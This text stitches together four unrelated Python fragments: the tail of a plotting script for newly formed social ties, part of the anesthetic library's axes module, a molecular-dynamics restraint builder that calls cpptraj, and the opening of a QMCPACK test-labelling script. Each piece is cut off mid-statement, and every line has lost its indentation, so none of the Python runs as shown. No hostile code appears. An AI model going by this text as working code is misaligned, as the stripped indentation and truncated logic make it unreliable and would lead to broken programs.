ecolor='#34495e', marker='^', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg3)):
H[i].append(mt.log(avg3[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#2980b9", ls='--', label='$=3$',
ecolor='#2980b9', marker='s', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg4)):
H[i].append(mt.log(avg4[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#7f8c8d", ls='--', label='$=4$',
ecolor='#7f8c8d', marker='p', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg5)):
H[i].append(mt.log(avg5[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#c0392b", ls='--', label='$=5$',
ecolor='#c0392b', marker='H', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg6)):
H[i].append(mt.log(avg6[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#8e44ad", ls='--', label='$\geq6$',
ecolor='#8e44ad', marker='8', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.xticks([2, 3, 4, 5, 6, 7, 8], ['2', '3', '4', '5', '6', '7', '8'], fontsize=20)
plt.yticks(fontsize=20)
plt.xlabel("Phase", fontsize=25)
plt.ylabel("$log$(Interaction {})".format(interactions), fontsize=25)
legend = plt.legend(frameon=False, loc='upper right', title='Tie Range in Phase 2', fontsize=20)
legend.get_title().set_fontsize(fontsize=20)
plt.title('Newly Formed Ties', fontsize=30)
if interactions == 'Frequency':
plt.ylim([0, 1.2])
plt.subplots_adjust(left=0.145, bottom=0.11, right=0.98, top=0.935)
plt.savefig('Plots/SI/Mainresults_NewTies_F.pdf', format='pdf')
if interactions == 'Duration':
plt.ylim([0, 5])
plt.subplots_adjust(left=0.145, bottom=0.11, right=0.98, top=0.935)
plt.savefig('Plots/SI/Mainresults_NewTies_D.pdf', format='pdf')
# plt.show()
# Fig.~S12(c&f)
def Existing_Newlyformed_pp(choice):
if choice == 1:
Data = read('Results/oldedge/Graph_Season_TR_Frequency.txt')
if choice == 2:
Data = read('Results/newedge/Graph_Season_TR_Frequency.txt')
avg2, avg3, avg4, avg5, avg6 = [], [], [], [], []
GH = nx.read_gexf('Graph/Season/Frequency/G_Frequency_Season_1.gexf')
Large = max(nx.connected_components(GH),key=len)
for data in Data:
if data.count('-1') == 0:
if data[0] in Large and data[1] in Large:
if data[2] == '2':
avg2.append(list(map(int, map(float, data[9:]))))
if data[2] == '3':
avg3.append(list(map(int, map(float, data[9:]))))
if data[2] == '4':
avg4.append(list(map(int, map(float, data[9:]))))
if data[2] == '5':
avg5.append(list(map(int, map(float, data[9:]))))
if int(data[2]) >= 6 and int(data[2]) < 100:
avg6.append(list(map(int, map(float, data[9:]))))
H = []
Count = [0 for _ in range(6)]
for data in avg2:
for _ in range(6):
if data[_ + 1] == 0:
Count[_] += 1
for _ in range(6):
H.append([1 - Count[_] / len(avg2), '$=2$', int(_ + 3)])
Count = [0 for _ in range(6)]
for data in avg3:
for _ in range(6):
if data[_ + 1] == 0:
Count[_] += 1
for _ in range(6):
H.append([1 - Count[_] / len(avg3), '$=3$', int(_ + 3)])
Count = [0 for _ in range(6)]
for data in avg4:
for _ in range(6):
if data[_ + 1] == 0:
Count[_] += 1
for _ in range(6):
H.append([1 - Count[_] / len(avg4), '$=4$', int(_ + 3)])
Count = [0 for _ in range(6)]
for data in avg5:
for _ in range(6):
if data[_ + 1] == 0:
Count[_] += 1
for _ in range(6):
H.append([1 - Count[_] / len(avg5), '$=5$', int(_ + 3)])
Count = [0 for _ in range(6)]
for data in avg6:
for _ in range(6):
if data[_ + 1] == 0:
Count[_] += 1
for _ in range(6):
H.append([1 - Count[_] / len(avg6), '$\geq6$', int(_ + 3)])
H.append([1, '$=2$', 2])
H.append([1, '$=3$', 2])
H.append([1, '$=4$', 2])
H.append([1, '$=5$', 2])
H.append([1, '$\geq6$', 2])
if choice == 1:
fig = plt.figure(figsize=(7, 7))
ax = plt.axes()
X = [2, 3, 4, 5, 6, 7, 8]
Y = [1, 0.736412550974173, 0.7031490711372904, 0.630629814227458, 0.592359537834164, 0.5328103760761214,
0.5092659719075668]
plt.plot(X, Y, color='#34495e', label='$=2$', marker='^', markersize=10, linewidth=2)
Y = [1, 0.5344482512975338, 0.5021540757827606, 0.4311883035381119, 0.39811391159808673, 0.3356965975779368,
0.3241968859187897]
plt.plot(X, Y, color='#2980b9', | |
"""Lower-level plotting tools.
Routines that may be of use to users wishing for more fine-grained control may
wish to use.
- ``make_1d_axes``
- ``make_2d_axes``
to create a set of axes and legend proxies.
"""
import numpy as np
import pandas
import matplotlib.pyplot as plt
from scipy.stats import gaussian_kde
from matplotlib.gridspec import GridSpec as GS, GridSpecFromSubplotSpec as SGS
try:
from astropy.visualization import hist
except ImportError:
pass
try:
from anesthetic.kde import fastkde_1d, fastkde_2d
except ImportError:
pass
import matplotlib.cbook as cbook
import matplotlib.lines as mlines
from matplotlib.ticker import MaxNLocator
from matplotlib.colors import LinearSegmentedColormap
from matplotlib.transforms import Affine2D
from anesthetic.utils import check_bounds, nest_level
from anesthetic.utils import (sample_compression_1d, quantile,
triangular_sample_compression_2d,
iso_probability_contours,
iso_probability_contours_from_samples,
scaled_triangulation, match_contour_to_contourf)
from anesthetic.boundary import cut_and_normalise_gaussian
class AxesSeries(pandas.Series):
"""Anesthetic's axes version of `pandas.Series`."""
@property
def _constructor(self):
return AxesSeries
@property
def _constructor_expanddim(self):
return AxesDataFrame
class AxesDataFrame(pandas.DataFrame):
"""Anesthetic's axes version of `pandas.DataFrame`."""
@property
def _constructor(self):
return AxesDataFrame
@property
def _constructor_sliced(self):
return AxesSeries
def axlines(self, params, values, **kwargs):
"""Add vertical and horizontal lines across all axes.
Parameters
----------
params : str or list(str)
parameter label(s).
Should match the size of `values`.
values : float or list(float)
value(s) at which vertical and horizontal lines shall be added.
Should match the size of `params`.
kwargs
Any kwarg that can be passed to `plt.axvline` or `plt.axhline`.
"""
params = np.ravel(params)
values = np.ravel(values)
if params.size != values.size:
raise ValueError("The sizes of `params` and `values` must match "
"exactly, but params.size=%s and values.size=%s."
% (params.size, values.size))
for i, param in enumerate(params):
if param in self.columns:
for ax in self.loc[:, param]:
if ax is not None:
ax.axvline(values[i], **kwargs)
if param in self.index:
for ax in self.loc[param, self.columns != param]:
if ax is not None:
ax.axhline(values[i], **kwargs)
def axspans(self, params, vmins, vmaxs, **kwargs):
"""Add vertical and horizontal spans across all axes.
Parameters
----------
params : str or list(str)
parameter label(s).
Should match the size of `vmins` and `vmaxs`.
vmins : float or list(float)
Minimum value of the vertical and horizontal axes spans.
Should match the size of `params`.
vmaxs : float or list(float)
Maximum value of the vertical and horizontal axes spans.
Should match the size of `params`.
kwargs
Any kwarg that can be passed to `plt.axvspan` or `plt.axhspan`.
"""
kwargs = normalize_kwargs(kwargs, dict(color=['c']))
params = np.ravel(params)
vmins = np.ravel(vmins)
vmaxs = np.ravel(vmaxs)
if params.size != vmins.size:
raise ValueError("The sizes of `params`, `vmins` and `vmaxs` must "
"match exactly, but params.size=%s, "
"vmins.size=%s and vmaxs.size=%s."
% (params.size, vmins.size, vmaxs.size))
for i, param in enumerate(params):
if param in self.columns:
for ax in self.loc[:, param]:
if ax is not None:
ax.axvspan(vmins[i], vmaxs[i], **kwargs)
if param in self.index:
for ax in self.loc[param, self.columns != param]:
if ax is not None:
ax.axhspan(vmins[i], vmaxs[i], **kwargs)
def make_1d_axes(params, **kwargs):
"""Create a set of axes for plotting 1D marginalised posteriors.
Parameters
----------
params: list(str)
names of parameters.
tex: dict(str:str), optional
Dictionary mapping params to tex plot labels.
fig: matplotlib.figure.Figure, optional
Figure to plot on.
Default: matplotlib.pyplot.figure()
ncols: int
Number of columns in the plot
option, default ceil(sqrt(num_params))
subplot_spec: matplotlib.gridspec.GridSpec, optional
gridspec to plot array as part of a subfigure
Default: None
Returns
-------
fig: matplotlib.figure.Figure
New or original (if supplied) figure object
axes: pandas.Series(matplotlib.axes.Axes)
Pandas array of axes objects
"""
axes = AxesSeries(index=np.atleast_1d(params), dtype=object)
axes[:] = None
tex = kwargs.pop('tex', {})
fig = kwargs.pop('fig') if 'fig' in kwargs else plt.figure()
ncols = kwargs.pop('ncols', int(np.ceil(np.sqrt(len(axes)))))
nrows = int(np.ceil(len(axes)/float(ncols)))
if 'subplot_spec' in kwargs:
grid = SGS(nrows, ncols, wspace=0,
subplot_spec=kwargs.pop('subplot_spec'))
else:
grid = GS(nrows, ncols, wspace=0)
if kwargs:
raise TypeError('Unexpected **kwargs: %r' % kwargs)
tex = {p: tex[p] if p in tex else p for p in axes.index}
for p, g in zip(axes.index, grid):
axes[p] = ax = fig.add_subplot(g)
ax.set_xlabel(tex[p])
ax.set_yticks([])
for x, ax in axes.dropna().iteritems():
ax.xaxis.set_major_locator(MaxNLocator(2, integer=True))
return fig, axes
def make_2d_axes(params, **kwargs):
"""Create a set of axes for plotting 2D marginalised posteriors.
Parameters
----------
params: lists of parameters
Can be either:
* list(str) if the x and y axes are the same
* [list(str),list(str)] if the x and y axes are different
Strings indicate the names of the parameters
tex: dict(str:str), optional
Dictionary mapping params to tex plot labels.
Default: params
upper, lower, diagonal: logical, optional
Whether to create 2D marginalised plots above or below the
diagonal, or to create a 1D marginalised plot on the diagonal.
Default: True
fig: matplotlib.figure.Figure, optional
Figure to plot on.
Default: matplotlib.pyplot.figure()
ticks: str
If 'outer', plot ticks only on the very left and very bottom.
If 'inner', plot ticks also in inner subplots.
If None, plot no ticks at all.
Default: 'outer'
subplot_spec: matplotlib.gridspec.GridSpec, optional
gridspec to plot array as part of a subfigure.
Default: None
Returns
-------
fig: matplotlib.figure.Figure
New or original (if supplied) figure object
axes: pandas.DataFrame(matplotlib.axes.Axes)
Pandas array of axes objects
"""
if nest_level(params) == 2:
xparams, yparams = params
else:
xparams = yparams = params
ticks = kwargs.pop('ticks', 'outer')
upper = kwargs.pop('upper', True)
lower = kwargs.pop('lower', True)
diagonal = kwargs.pop('diagonal', True)
axes = AxesDataFrame(index=np.atleast_1d(yparams),
columns=np.atleast_1d(xparams),
dtype=object)
axes[:][:] = None
all_params = list(axes.columns) + list(axes.index)
for j, y in enumerate(axes.index):
for i, x in enumerate(axes.columns):
if all_params.index(x) < all_params.index(y):
if lower:
axes[x][y] = -1
elif all_params.index(x) > all_params.index(y):
if upper:
axes[x][y] = +1
elif diagonal:
axes[x][y] = 0
axes.dropna(axis=0, how='all', inplace=True)
axes.dropna(axis=1, how='all', inplace=True)
tex = kwargs.pop('tex', {})
tex = {p: tex[p] if p in tex else p for p in all_params}
fig = kwargs.pop('fig') if 'fig' in kwargs else plt.figure()
spec = kwargs.pop('subplot_spec', None)
if axes.shape[0] != 0 and axes.shape[1] != 0:
if spec is not None:
grid = SGS(*axes.shape, hspace=0, wspace=0, subplot_spec=spec)
else:
grid = GS(*axes.shape, hspace=0, wspace=0)
if kwargs:
raise TypeError('Unexpected **kwargs: %r' % kwargs)
if axes.size == 0:
return fig, axes
position = axes.copy()
axes[:][:] = None
for j, y in enumerate(axes.index[::-1]):
for i, x in enumerate(axes.columns):
if position[x][y] is not None:
sx = list(axes[x].dropna())
sx = sx[0] if sx else None
sy = list(axes.T[y].dropna())
sy = sy[0] if sy else None
axes[x][y] = fig.add_subplot(grid[axes.index.size-1-j, i],
sharex=sx, sharey=sy)
if position[x][y] == 0:
axes[x][y].twin = axes[x][y].twinx()
axes[x][y].twin.set_yticks([])
axes[x][y].twin.set_ylim(0, 1.1)
axes[x][y].set_zorder(axes[x][y].twin.get_zorder() + 1)
axes[x][y].lines = axes[x][y].twin.lines
axes[x][y].patches = axes[x][y].twin.patches
axes[x][y].collections = axes[x][y].twin.collections
axes[x][y].containers = axes[x][y].twin.containers
make_diagonal(axes[x][y])
axes[x][y].position = 'diagonal'
axes[x][y].twin.xaxis.set_major_locator(
MaxNLocator(3, prune='both'))
else:
if position[x][y] == 1:
axes[x][y].position = 'upper'
elif position[x][y] == -1:
axes[x][y].position = 'lower'
axes[x][y].yaxis.set_major_locator(
MaxNLocator(3, prune='both'))
axes[x][y].xaxis.set_major_locator(
MaxNLocator(3, prune='both'))
for y, ax in axes.bfill(axis=1).iloc[:, 0].dropna().iteritems():
ax.set_ylabel(tex[y])
for x, ax in axes.ffill(axis=0).iloc[-1, :].dropna().iteritems():
ax.set_xlabel(tex[x])
# left and right ticks and labels
for y, ax in axes.iterrows():
ax_ = ax.dropna()
if len(ax_) and ticks == 'inner':
for i, a in enumerate(ax_):
if i == 0: # first column
if a.position == 'diagonal' and len(ax_) == 1:
a.tick_params('y', left=False, labelleft=False)
else:
a.tick_params('y', left=True, labelleft=True)
elif a.position == 'diagonal': # not first column
tl = a.yaxis.majorTicks[0].tick1line.get_markersize()
a.tick_params('y', direction='out', length=tl/2,
left=True, labelleft=False)
else: # not diagonal and not first column
a.tick_params('y', direction='inout',
left=True, labelleft=False)
elif len(ax_) and ticks == 'outer': # no inner ticks
for a in ax_[1:]:
a.tick_params('y', left=False, labelleft=False)
elif len(ax_) and ticks is None: # no ticks at all
for a in ax_:
a.tick_params('y', left=False, right=False,
labelleft=False, labelright=False)
else:
raise ValueError(
"ticks=%s was requested, but ticks can only be one of "
"['outer', 'inner', None]." % ticks)
# bottom and top ticks and labels
for x, ax in axes.iteritems():
ax_ = ax.dropna()
if len(ax_):
if ticks == 'inner':
for i, a in enumerate(ax_):
if i == len(ax_) - 1: # bottom row
a.tick_params('x', bottom=True, labelbottom=True)
else: # not bottom row
a.tick_params('x', direction='inout',
bottom=True, labelbottom=False)
if a.position == 'diagonal':
a.twin.tick_params('x', direction='inout',
bottom=True, labelbottom=False)
elif ticks == 'outer': # no inner ticks
for a in ax_[:-1]:
a.tick_params('x', bottom=False, labelbottom=False)
elif ticks is None: # no ticks at all
for a in ax_:
a.tick_params('x', bottom=False, top=False,
labelbottom=False, labeltop=False)
else:
raise ValueError(
"ticks=%s was requested, but ticks can only be one of "
"['outer', 'inner', None]." % ticks)
return fig, axes
def fastkde_plot_1d(ax, data, *args, **kwargs):
"""Plot a 1d marginalised distribution.
This functions as a wrapper around matplotlib.axes.Axes.plot, with a kernel
density estimation computation provided by the package | |
#!/usr/bin/env python2
import datetime as dt
import glob as glob
import os as os
import re
import shutil as shutil
import signal as signal
import subprocess as sp
import sys as sys
from lib import scripts as scripts
def restraints(pose, rest, bb_start, bb_end, weight, stage, mol, comp, bb_equil, sdr_dist, dec_method):
rst = []
atm_num = []
mlines = []
hvy_h = []
hvy_g = []
msk = []
pdb_file = ('vac.pdb')
ligand_pdb_file = ('vac_ligand.pdb')
# Restraint identifiers
recep_tr = '#Rec_TR'
recep_c = '#Rec_C'
recep_d = '#Rec_D'
lign_tr = '#Lig_TR'
lign_c = '#Lig_C'
lign_d = '#Lig_D'
# Change to simulation directory
if stage != 'fe':
os.chdir(pose)
# Find anchors
with open(stage+'-%s.pdb' % mol.lower(), 'r') as f:
data = f.readline().split()
P1 = data[2].strip()
P2 = data[3].strip()
P3 = data[4].strip()
p1_res = P1.split('@')[0][1:]
p2_res = P2.split('@')[0][1:]
p3_res = P3.split('@')[0][1:]
p1_atom = P1.split('@')[1]
p2_atom = P2.split('@')[1]
p3_atom = P3.split('@')[1]
L1 = data[5].strip()
L2 = data[6].strip()
L3 = data[7].strip()
l1_atom = L1.split('@')[1]
l2_atom = L2.split('@')[1]
l3_atom = L3.split('@')[1]
lig_res = L1.split('@')[0][1:]
first_res = data[8].strip()
recep_last = data[9].strip()
# Get backbone atoms and adjust anchors
if (comp != 'c' and comp != 'r' and comp != 'f' and comp != 'w'):
# Get protein backbone atoms
with open('./vac.pdb') as f_in:
lines = (line.rstrip() for line in f_in)
lines = list(line for line in lines if line) # Non-blank lines in a list
for i in range(0, len(lines)):
if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
if int(lines[i][22:26].strip()) >= 2 and int(lines[i][22:26].strip()) < int(lig_res):
data = lines[i][12:16].strip()
if data == 'CA' or data == 'N' or data == 'C' or data == 'O':
hvy_h.append(lines[i][6:11].strip())
if dec_method == 'sdr':
if (comp == 'e' or comp == 'v'):
rec_res = int(recep_last) + 2
lig_res = str((int(lig_res) + 1))
L1 = ':'+lig_res+'@'+l1_atom
L2 = ':'+lig_res+'@'+l2_atom
L3 = ':'+lig_res+'@'+l3_atom
hvy_h = []
hvy_g = []
# Adjust anchors
p1_resid = str(int(p1_res) + 1)
p2_resid = str(int(p2_res) + 1)
p3_resid = str(int(p3_res) + 1)
P1 = ":"+p1_resid+"@"+p1_atom
P2 = ":"+p2_resid+"@"+p2_atom
P3 = ":"+p3_resid+"@"+p3_atom
# Get host heavy atoms
with open('./vac.pdb') as f_in:
lines = (line.rstrip() for line in f_in)
lines = list(line for line in lines if line) # Non-blank lines in a list
for i in range(0, len(lines)):
if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
if int(lines[i][22:26].strip()) >= 3 and int(lines[i][22:26].strip()) <= rec_res:
data = lines[i][12:16].strip()
if data == 'CA' or data == 'N' or data == 'C' or data == 'O':
hvy_h.append(lines[i][6:11].strip())
# Get bulk guest heavy atoms
with open('./vac.pdb') as f_in:
lines = (line.rstrip() for line in f_in)
lines = list(line for line in lines if line) # Non-blank lines in a list
if comp == 'e':
for i in range(0, len(lines)):
if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
if lines[i][22:26].strip() == str(int(lig_res) + 2):
data = lines[i][12:16].strip()
if data[0] != 'H':
hvy_g.append(lines[i][6:11].strip())
if comp == 'v':
for i in range(0, len(lines)):
if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
if lines[i][22:26].strip() == str(int(lig_res) + 1):
data = lines[i][12:16].strip()
if data[0] != 'H':
hvy_g.append(lines[i][6:11].strip())
# Adjust anchors for ligand only
if (comp == 'c' or comp == 'w' or comp == 'f'):
L1 = L1.replace(':'+lig_res, ':1')
L2 = L2.replace(':'+lig_res, ':1')
L3 = L3.replace(':'+lig_res, ':1')
# Adjust anchors for protein only
if (comp == 'r'):
p1_new = int(p1_res) - 1
p2_new = int(p2_res) - 1
p3_new = int(p3_res) - 1
P1 = P1.replace(':'+p1_res, ':'+str(p1_new))
P2 = P2.replace(':'+p2_res, ':'+str(p2_new))
P3 = P3.replace(':'+p3_res, ':'+str(p3_new))
# Get a relation between atom number and masks
atm_num = scripts.num_to_mask(pdb_file)
ligand_atm_num = scripts.num_to_mask(ligand_pdb_file)
# Get number of ligand atoms
with open('./vac_ligand.pdb') as myfile:
data = myfile.readlines()
vac_atoms = int(data[-3][6:11].strip())
# Define anchor atom distance restraints on the protein
rst.append(''+P1+' '+P2+'')
rst.append(''+P2+' '+P3+'')
rst.append(''+P3+' '+P1+'')
# Define protein dihedral restraints in the given range
beg = bb_start - int(first_res) + 2
end = bb_end - int(first_res) + 2
if dec_method == 'sdr':
if (comp == 'e' or comp == 'v'):
beg = bb_start - int(first_res) + 3
end = bb_end - int(first_res) + 3
nd = 0
for i in range(beg, end+1):
j = i+1
psi1 = ':'+str(i)+'@N'
psi2 = ':'+str(i)+'@CA'
psi3 = ':'+str(i)+'@C'
psi4 = ':'+str(j)+'@N'
psit = '%s %s %s %s' % (psi1, psi2, psi3, psi4)
rst.append(psit)
nd += 1
phi1 = ':'+str(i)+'@C'
phi2 = ':'+str(j)+'@N'
phi3 = ':'+str(j)+'@CA'
phi4 = ':'+str(j)+'@C'
phit = '%s %s %s %s' % (phi1, phi2, phi3, phi4)
rst.append(phit)
nd += 1
# Define translational/rotational and anchor atom distance restraints on the ligand
rst.append(''+P1+' '+L1+'')
rst.append(''+P2+' '+P1+' '+L1+'')
rst.append(''+P3+' '+P2+' '+P1+' '+L1+'')
rst.append(''+P1+' '+L1+' '+L2+'')
rst.append(''+P2+' '+P1+' '+L1+' '+L2+'')
rst.append(''+P1+' '+L1+' '+L2+' '+L3+'')
# New restraints for ligand only
if (comp == 'c' or comp == 'w' or comp == 'f'):
rst = []
# Get ligand dihedral restraints from ligand parameter/pdb file
spool = 0
with open('./vac_ligand.prmtop') as fin:
lines = (line.rstrip() for line in fin)
lines = list(line for line in lines if line) # Non-blank lines in a list
for line in lines:
if 'FLAG DIHEDRALS_WITHOUT_HYDROGEN' in line:
spool=1
elif 'FLAG EXCLUDED_ATOMS_LIST' in line:
spool=0
if spool != 0 and (len(line.split()) > 3):
mlines.append(line)
for i in range(0, len(mlines)):
data = mlines[i].split()
if int(data[3]) > 0:
anum = []
for j in range (0, len(data)):
anum.append(abs(int(data[j])//3)+1)
msk.append('%s %s %s %s' %(ligand_atm_num[anum[0]], ligand_atm_num[anum[1]], ligand_atm_num[anum[2]], ligand_atm_num[anum[3]]))
for i in range(0, len(mlines)):
data = mlines[i].split()
if len(data) > 7:
if int(data[8]) > 0:
anum = []
for j in range (0, len(data)):
anum.append(abs(int(data[j])//3)+1)
msk.append('%s %s %s %s' %(ligand_atm_num[anum[5]], ligand_atm_num[anum[6]], ligand_atm_num[anum[7]], ligand_atm_num[anum[8]]))
excl = msk[:]
ind = 0
mat = []
for i in range(0, len(excl)):
data = excl[i].split()
for j in range(0, len(excl)):
if j == i:
break
data2 = excl[j].split()
if (data[1] == data2[1] and data[2] == data2[2]) or (data[1] == data2[2] and data[2] == data2[1]):
ind = 0
for k in range(0, len(mat)):
if mat[k] == j:
ind = 1
if ind == 0:
mat.append(j)
for i in range(0, len(mat)):
msk[mat[i]]= ''
if (comp != 'c' and comp != 'w' and comp != 'f'):
msk = filter(None, msk)
msk = [m.replace(':1',':'+lig_res) for m in msk]
for i in range(0, len(msk)):
rst.append(msk[i])
# New restraints for protein only
if (comp == 'r'):
rst = []
rst.append(''+P1+' '+P2+'')
rst.append(''+P2+' '+P3+'')
rst.append(''+P3+' '+P1+'')
beg = bb_start - int(first_res) + 1
end = bb_end - int(first_res) + 1
nd = 0
for i in range(beg, end+1):
j = i+1
psi1 = ':'+str(i)+'@N'
psi2 = ':'+str(i)+'@CA'
psi3 = ':'+str(i)+'@C'
psi4 = ':'+str(j)+'@N'
psit = '%s %s %s %s' % (psi1, psi2, psi3, psi4)
rst.append(psit)
nd += 1
phi1 = ':'+str(i)+'@C'
phi2 = ':'+str(j)+'@N'
phi3 = ':'+str(j)+'@CA'
phi4 = ':'+str(j)+'@C'
phit = '%s %s %s %s' % (phi1, phi2, phi3, phi4)
rst.append(phit)
nd += 1
# Get initial restraint values for references
assign_file = open('assign.in', 'w')
assign_file.write('%s %s %s %s %s %s %s\n'%('# Anchor atoms', P1, P2, P3, L1, L2, L3))
assign_file.write('parm full.hmr.prmtop\n')
assign_file.write('trajin full.inpcrd\n')
for i in range(0, len(rst)):
arr = rst[i].split()
if len(arr) == 2:
assign_file.write('%s %s %s'%('distance r'+str(i), rst[i], 'noimage out assign.dat\n'))
if len(arr) == 3:
assign_file.write('%s %s %s'%('angle r'+str(i), rst[i], 'out assign.dat\n'))
if len(arr) == 4:
assign_file.write('%s %s %s'%('dihedral r'+str(i), rst[i], 'out assign.dat\n'))
assign_file.close()
sp.call('cpptraj -i assign.in > assign.log', shell=True)
# Assign reference values for restraints
with open('./assign.dat') as fin:
lines = (line.rstrip() for line in fin)
lines = list(line for line in lines if line) # Non-blank lines in a list
vals = | |
#! /usr/bin/env python3
import sys
import traceback
def error(msg=None):
if msg is None:
sys.stdout.write(traceback.format_exc())
else:
sys.stdout.write('error: '+msg+'\n')
#end if
sys.exit(1)
#end def error
# label descriptions
#
# main classification
# stable - test is expected to pass
# unstable - test may fail (definitely or with some probability)
# (stable/unstable are exclusive and comprehensive for all tests)
#
# reason for instability
# bug - test failure definitely a bug and QMCPACK needs to be fixed
# unsupported - test fails because feature is not supported and was not before
# poor_test - test fails because test is insufficient (false positive)
# cause_unknown - cause/nature of failure is not known and needs investigation
# (bug/unsupported/poor/unknown are comprehensive for failures)
#
# failure type classification of unstable tests
# hard_fail - ungraceful crash (segfault, etc)
# abort - controlled abort
# check_fail - fails rigorous non-statistical check (e.g. checksum)
# reference_stat_fail - fails separate reference level check by > 5 sigma
# definite_stat_fail - statistical failure by > 5 sigma
# intermittent_stat_fail - statistical failure by < 5 sigma
# deterministic_fail - fails non-rigorous deterministic check
# (failure types are comprehensive for failures)
#
# test quality categories
# good_test - test well designed: test fail means there is a bug
# any failure means: action needed to fix QMCPACK
# poor_test - test poorly designed and failure likely reflects this
# regardless of pass/fail: action needed to improve test
# quality_unknown - test quality has not yet been assessed
# code failure means: action needed to fix QMCPACK
# statistical failure means: prioritize quality assessment
# (good/poor/unknown are exclusive and comprehensive for all tests)
#
# put failing tests into the following categories (these determine the others)
# unsupported
# hard_fail
# abort
# check_fail
# reference_stat_fail
# definite_stat_fail
# intermittent_stat_fail
# deterministic_fail
# poor_test
#
# main actions for developers and corresponding categories
# fix known bugs in QMCPACK - identified by label "bug"
# fix poor tests - identified by label "poor_test"
# assess test quality - identified by label "quality_unknown"
# investigate failure causes - identified by label "cause_unknown"
# run reference-level statistical test in this case
def create_label_sets():
# primary sets, all others derived from these
unsupported = set() # failure categories may depend on build
hard_fail = set()
abort = set()
check_fail = set()
reference_stat_fail = set()
definite_stat_fail = set()
intermittent_stat_fail = set()
deterministic_fail = set()
good_test = set() # test quality does not depend on build
poor_test = set()
# universal failures (irrespective of build)
hard_fail |= set([
# https://github.com/QMCPACK/qmcpack/issues/848
'developer-heg_54_J2rpa',
])
abort |= set([
# https://github.com/QMCPACK/qmcpack/issues/998
'long-LiH_dimer_pp-vmc_hf_sdj_estimator_spindensity',
'short-LiH_dimer_pp-vmc_hf_sdj_estimator_spindensity',
# https://github.com/QMCPACK/qmcpack/issues/1040
'short-diamondC-afqmc_hyb_nn2',
'short-diamondC-afqmc_incmf_nn2',
'short-diamondC-afqmc_nn2',
])
check_fail |= set([
# https://github.com/QMCPACK/qmcpack/issues/934
'short-diamondC_1x1x1_pp-dmc-estimator-density',
'short-diamondC_1x1x1_pp-dmc-estimator-spindensity',
'long-diamondC_1x1x1_pp-dmc-estimator-density',
'long-diamondC_1x1x1_pp-dmc-estimator-spindensity',
])
definite_stat_fail |= set([
# https://github.com/QMCPACK/qmcpack/issues/995
# https://github.com/QMCPACK/qmcpack/issues/1052
'short-diamondC_1x1x1_pp-vmc-J2-estimator-1rdm-4-4',
'short-diamondC_1x1x1_pp-vmc-noJ-estimator-1rdm-4-4',
'long-diamondC_1x1x1_pp-vmc-J2-estimator-1rdm-4-4',
'long-diamondC_1x1x1_pp-vmc-noJ-estimator-1rdm-4-4',
# https://github.com/QMCPACK/qmcpack/issues/982
'long-diamondC_1x1x1_pp-vmc-estimator-energydensity-voronoi',
'long-diamondC_1x1x1_pp-vmc-estimator-energydensity-cell',
'long-diamondC_1x1x1_pp-dmc-estimator-energydensity-cell',
'long-LiH_dimer_ae-vmc_hf_noj_estimator_energydensity_voronoi',
'long-LiH_dimer_ae-vmc_hf_sdj_estimator_energydensity_voronoi',
'short-diamondC_1x1x1_pp-vmc-estimator-energydensity-voronoi',
'short-diamondC_1x1x1_pp-vmc-estimator-energydensity-cell',
'short-diamondC_1x1x1_pp-dmc-estimator-energydensity-cell',
'short-LiH_dimer_ae-vmc_hf_noj_estimator_energydensity_voronoi',
'short-LiH_dimer_ae-vmc_hf_sdj_estimator_energydensity_voronoi',
])
intermittent_stat_fail |= set([
'long-diamondC_1x1x1_pp-vmc-dmc-allp_sdj',
'long-diamondC_2x1x1_pp-dmc-reconf_sdj',
'long-diamondC_2x1x1_pp-vmc_sdj',
'long-H2O_dimer_sep_pp-j3_dmc_la',
'short-bccH_1x1x1_ae-csvmc-all_sdj',
'short-bccH_1x1x1_ae-csvmc-all-nodrift_sdj',
'short-bccH_1x1x1_ae-csvmc-pbyp-nodrift_sdj',
'short-bccH_1x1x1_ae-dmc-all_sdj',
'short-bccH_1x1x1_ae-vmc-all-nodrift_sdj',
'short-C2_pp-msdj_vmc',
'short-C2_pp-msdj-traditional_vmc',
'short-diamondC_1x1x1_pp-vmc-dmc-allp_sdj',
'short-diamondC_2x1x1_pp-dmc-reconf_sdj',
'short-H4-opt-adaptive',
'long-LiH_dimer_ae_qp-vmc_hf_noj',
'short-LiH_dimer_pp-vmc_hf_sdj_hdf5',
'short-LiH_dimer_pp-vmc_hf_sdj_xml',
'short-LiH_solid_1x1x1_pp-x-dmcnl-hf_noj',
'short-LiH_solid_1x1x1_hybridrep_pp-x-vmc_hf_noj',
'short-diamondC_1x1x1_pp-vmc_sdj_kspace-1-16',
'short-diamondC_2x1x1_pp-dmc_sdj-1-16',
'short-diamondC_2x1x1_hybridrep_pp-vmc_sdj',
'short-bccH_1x1x1_ae-dmc_sdj',
